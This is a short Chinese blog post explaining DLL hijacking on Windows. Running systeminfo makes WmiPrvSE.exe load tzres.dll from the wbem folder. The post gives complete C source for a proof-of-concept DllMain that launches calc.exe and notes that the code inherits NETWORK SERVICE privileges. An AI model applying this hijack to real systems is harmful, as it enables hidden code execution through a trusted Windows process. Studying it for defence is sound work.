systeminfo、WmiPreSE.exe,dll劫持

在执行systeminfo命令时,systeminfo.exe内部通过wmi和LPC的方式获取数据,WmiPrvse.exe在执行实际操作时会去加载tzres.dll

systeminfo、WmiPreSE.exe,dll劫持_第1张图片
dll路径:C:\Windows\System32\wbem\tzres.dll

#include 
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

由于WmiPrvSE.exe是NETWORK SERVICE权限,所以被创建的子进程都继承了这个权限。
systeminfo、WmiPreSE.exe,dll劫持_第2张图片

你可能感兴趣的:(系统白程序利用,dll劫持,白利用)